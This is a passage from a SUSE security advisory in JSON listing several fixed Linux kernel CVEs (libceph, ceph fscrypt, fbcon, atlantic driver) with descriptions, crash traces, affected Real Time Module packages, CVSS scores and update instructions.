"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68261"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68296",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68296"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup\n\nProtect vga_switcheroo_client_fb_set() with console lock. Avoids OOB\naccess in fbcon_remap_all(). Without holding the console lock the call\nraces with switching outputs.\n\nVGA switcheroo calls fbcon_remap_all() when switching clients. The fbcon\nfunction uses struct fb_info.node, which is set by register_framebuffer().\nAs the fb-helper code currently sets up VGA switcheroo before registering\nthe framebuffer, the value of node is -1 and therefore not a legal value.\nFor example, fbcon uses the value within set_con2fb_map() [1] as an index\ninto an array.\n\nMoving vga_switcheroo_client_fb_set() after register_framebuffer() can\nresult in VGA switching that does not switch fbcon correctly.\n\nTherefore move vga_switcheroo_client_fb_set() under fbcon_fb_registered(),\nwhich already holds the console lock. Fbdev calls fbcon_fb_registered()\nfrom within register_framebuffer(). Serializes the helper with VGA\nswitcheroo\u0027s call to fbcon_remap_all().\n\nAlthough vga_switcheroo_client_fb_set() takes an instance of struct fb_info\nas parameter, it really only needs the contained fbcon state. Moving the\ncall to fbcon initialization is therefore cleaner than before. Only amdgpu,\ni915, nouveau and radeon support vga_switcheroo. For all other drivers,\nthis change does nothing.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68296",
"url": "https://www.suse.com/security/cve/CVE-2025-68296"
},
{
"category": "external",
"summary": "SUSE Bug 1255128 for CVE-2025-68296",
"url": "https://bugzilla.suse.com/1255128"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68296"
},
{
"cve": "CVE-2025-68297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nceph: fix crash in process_v2_sparse_read() for encrypted directories\n\nThe crash in process_v2_sparse_read() for fscrypt-encrypted directories\nhas been reported. Issue takes place for Ceph msgr2 protocol in secure\nmode. It can be reproduced by the steps:\n\nsudo mount -t ceph :/ /mnt/cephfs/ -o name=admin,fs=cephfs,ms_mode=secure\n\n(1) mkdir /mnt/cephfs/fscrypt-test-3\n(2) cp area_decrypted.tar /mnt/cephfs/fscrypt-test-3\n(3) fscrypt encrypt --source=raw_key --key=./my.key /mnt/cephfs/fscrypt-test-3\n(4) fscrypt lock /mnt/cephfs/fscrypt-test-3\n(5) fscrypt unlock --key=my.key /mnt/cephfs/fscrypt-test-3\n(6) cat /mnt/cephfs/fscrypt-test-3/area_decrypted.tar\n(7) Issue has been triggered\n\n[ 408.072247] ------------[ cut here ]------------\n[ 408.072251] WARNING: CPU: 1 PID: 392 at net/ceph/messenger_v2.c:865\nceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072267] Modules linked in: intel_rapl_msr intel_rapl_common\nintel_uncore_frequency_common intel_pmc_core pmt_telemetry pmt_discovery\npmt_class intel_pmc_ssram_telemetry intel_vsec kvm_intel joydev kvm irqbypass\npolyval_clmulni ghash_clmulni_intel aesni_intel rapl input_leds psmouse\nserio_raw i2c_piix4 vga16fb bochs vgastate i2c_smbus floppy mac_hid qemu_fw_cfg\npata_acpi sch_fq_codel rbd msr parport_pc ppdev lp parport efi_pstore\n[ 408.072304] CPU: 1 UID: 0 PID: 392 Comm: kworker/1:3 Not tainted 6.17.0-rc7+\n[ 408.072307] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\n1.17.0-5.fc42 04/01/2014\n[ 408.072310] Workqueue: ceph-msgr ceph_con_workfn\n[ 408.072314] RIP: 0010:ceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072317] Code: c7 c1 20 f0 d4 ae 50 31 d2 48 c7 c6 60 27 d5 ae 48 c7 c7 f8\n8e 6f b0 68 60 38 d5 ae e8 00 47 61 fe 48 83 c4 18 e9 ac fc ff ff \u003c0f\u003e 0b e9 06\nfe ff ff 4c 8b 9d 98 fd ff ff 0f 84 64 e7 ff ff 89 85\n[ 408.072319] RSP: 0018:ffff88811c3e7a30 EFLAGS: 00010246\n[ 408.072322] RAX: ffffed1024874c6f RBX: ffffea00042c2b40 RCX: 0000000000000f38\n[ 408.072324] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 408.072325] RBP: ffff88811c3e7ca8 R08: 0000000000000000 R09: 00000000000000c8\n[ 408.072326] R10: 00000000000000c8 R11: 0000000000000000 R12: 00000000000000c8\n[ 408.072327] R13: dffffc0000000000 R14: ffff8881243a6030 R15: 0000000000003000\n[ 408.072329] FS: 0000000000000000(0000) GS:ffff88823eadf000(0000)\nknlGS:0000000000000000\n[ 408.072331] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 408.072332] CR2: 000000c0003c6000 CR3: 000000010c106005 CR4: 0000000000772ef0\n[ 408.072336] PKRU: 55555554\n[ 408.072337] Call Trace:\n[ 408.072338] \u003cTASK\u003e\n[ 408.072340] ? sched_clock_noinstr+0x9/0x10\n[ 408.072344] ? __pfx_ceph_con_v2_try_read+0x10/0x10\n[ 408.072347] ? _raw_spin_unlock+0xe/0x40\n[ 408.072349] ? finish_task_switch.isra.0+0x15d/0x830\n[ 408.072353] ? __kasan_check_write+0x14/0x30\n[ 408.072357] ? mutex_lock+0x84/0xe0\n[ 408.072359] ? __pfx_mutex_lock+0x10/0x10\n[ 408.072361] ceph_con_workfn+0x27e/0x10e0\n[ 408.072364] ? metric_delayed_work+0x311/0x2c50\n[ 408.072367] process_one_work+0x611/0xe20\n[ 408.072371] ? __kasan_check_write+0x14/0x30\n[ 408.072373] worker_thread+0x7e3/0x1580\n[ 408.072375] ? __pfx__raw_spin_lock_irqsave+0x10/0x10\n[ 408.072378] ? __pfx_worker_thread+0x10/0x10\n[ 408.072381] kthread+0x381/0x7a0\n[ 408.072383] ? __pfx__raw_spin_lock_irq+0x10/0x10\n[ 408.072385] ? __pfx_kthread+0x10/0x10\n[ 408.072387] ? __kasan_check_write+0x14/0x30\n[ 408.072389] ? recalc_sigpending+0x160/0x220\n[ 408.072392] ? _raw_spin_unlock_irq+0xe/0x50\n[ 408.072394] ? calculate_sigpending+0x78/0xb0\n[ 408.072395] ? __pfx_kthread+0x10/0x10\n[ 408.072397] ret_from_fork+0x2b6/0x380\n[ 408.072400] ? __pfx_kthread+0x10/0x10\n[ 408.072402] ret_from_fork_asm+0x1a/0x30\n[ 408.072406] \u003c/TASK\u003e\n[ 408.072407] ---[ end trace 0000000000000000 ]---\n[ 408.072418] Oops: general protection fault, probably for non-canonical\naddress 0xdffffc00000000\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68297",
"url": "https://www.suse.com/security/cve/CVE-2025-68297"
},
{
"category": "external",
"summary": "SUSE Bug 1255403 for CVE-2025-68297",
"url": "https://bugzilla.suse.com/1255403"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68297"
},
{
"cve": "CVE-2025-68301",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68301"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: atlantic: fix fragment overflow handling in RX path\n\nThe atlantic driver can receive packets with more than MAX_SKB_FRAGS (17)\nfragments when handling large multi-descriptor packets. This causes an\nout-of-bounds write in skb_add_rx_frag_netmem() leading to kernel panic.\n\nThe issue occurs because the driver doesn\u0027t check the total number of\nfragments before calling skb_add_rx_frag(). When a packet requires more\nthan MAX_SKB_FRAGS fragments, the fragment index exceeds the array bounds.\n\nFix by assuming there will be an extra frag if buff-\u003elen \u003e AQ_CFG_RX_HDR_SIZE,\nthen all fragments are accounted for. And reusing the existing check to\nprevent the overflow earlier in the code path.\n\nThis crash occurred in production with an Aquantia AQC113 10G NIC.\n\nStack trace from production environment:\n```\nRIP: 0010:skb_add_rx_frag_netmem+0x29/0xd0\nCode: 90 f3 0f 1e fa 0f 1f 44 00 00 48 89 f8 41 89\nca 48 89 d7 48 63 ce 8b 90 c0 00 00 00 48 c1 e1 04 48 01 ca 48 03 90\nc8 00 00 00 \u003c48\u003e 89 7a 30 44 89 52 3c 44 89 42 38 40 f6 c7 01 75 74 48\n89 fa 83\nRSP: 0018:ffffa9bec02a8d50 EFLAGS: 00010287\nRAX: ffff925b22e80a00 RBX: ffff925ad38d2700 RCX:\nfffffffe0a0c8000\nRDX: ffff9258ea95bac0 RSI: ffff925ae0a0c800 RDI:\n0000000000037a40\nRBP: 0000000000000024 R08: 0000000000000000 R09:\n0000000000000021\nR10: 0000000000000848 R11: 0000000000000000 R12:\nffffa9bec02a8e24\nR13: ffff925ad8615570 R14: 0000000000000000 R15:\nffff925b22e80a00\nFS: 0000000000000000(0000)\nGS:ffff925e47880000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: ffff9258ea95baf0 CR3: 0000000166022004 CR4:\n0000000000f72ef0\nPKRU: 55555554\nCall Trace:\n\u003cIRQ\u003e\naq_ring_rx_clean+0x175/0xe60 [atlantic]\n? aq_ring_rx_clean+0x14d/0xe60 [atlantic]\n? aq_ring_tx_clean+0xdf/0x190 [atlantic]\n? kmem_cache_free+0x348/0x450\n? aq_vec_poll+0x81/0x1d0 [atlantic]\n? __napi_poll+0x28/0x1c0\n? net_rx_action+0x337/0x420\n```\n\nChanges in v4:\n- Add Fixes: tag to satisfy patch validation requirements.\n\nChanges in v3:\n- Fix by assuming there will be an extra frag if buff-\u003elen \u003e AQ_CFG_RX_HDR_SIZE,\n then all fragments are accounted for.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
